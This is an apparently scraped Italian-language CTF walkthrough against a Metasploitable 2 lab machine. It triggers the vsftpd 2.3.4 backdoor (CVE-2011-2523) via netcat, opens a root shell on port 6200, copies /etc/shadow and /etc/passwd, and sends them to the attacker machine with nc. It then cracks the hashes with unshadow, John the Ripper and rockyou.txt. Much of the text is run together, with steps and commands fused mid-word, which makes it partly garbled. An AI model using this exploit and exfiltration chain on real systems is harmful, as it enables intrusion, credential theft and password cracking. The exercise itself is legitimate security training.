
Walkthrough CTF passo-passo che sfrutta il backdoor vsftpd 2.3.4 (CVE-2011-2523) per catturare e decifrare /etc/shadow e /etc/passwd da Metasploitable 2.
Cattura il file decifrato /etc/shadow e /etc/passwd dal server vulnerabile Metasploitable 2.
Per questo CTF, eseguiamo VMware Workstation Pro con due macchine virtuali. Utilizziamo Kali Linux come macchina dell'attaccante e Metasploitable 2 come macchina vulnerabile.
Open a Virtual Machine in VMware Workstation e seleziona il file Kali Linux decompressoopen, quindi seleziona il file Metasploitable 2 decompressoPlay virtual machine su entrambe le macchine virtualiI moved It o I copied It, seleziona l'opzione I copied Itkali come nome utente e passwordmsfadmin come nome utente e passwordip addr show e registra l'indirizzo IP della sezione inetIl Massachusetts Institute of Technology Research and Engineering descrive CVE-2011-2523 come una vulnerabilità ed esposizione comune in cui vsftpd 2.3.4 scaricato tra il 20110630 e il 20110703 contiene una backdoor che apre una shell sulla porta 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:) alla fine, inserisci user <string>:)pass <string> nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami/etc/shadow e /etc/passwd in un altro filecp /etc/shadow shadow.txtcp /etc/passwd passwd.txtinet usando il comando ip addr shownc -l -p 1234 > shadow.txt sulla macchina attaccantenc -w 3 <destination-ip> 1234 < shadow.txtJohnunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input, dovrebbe contenere nome utente e password memorizzatiJohn e la wordlistrockyou.txt per craccare gli hash usando johnsudo gzip -d /usr/share/wordlists/rockyou.txt.gzkalijohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txtjohn –show unshadowed-input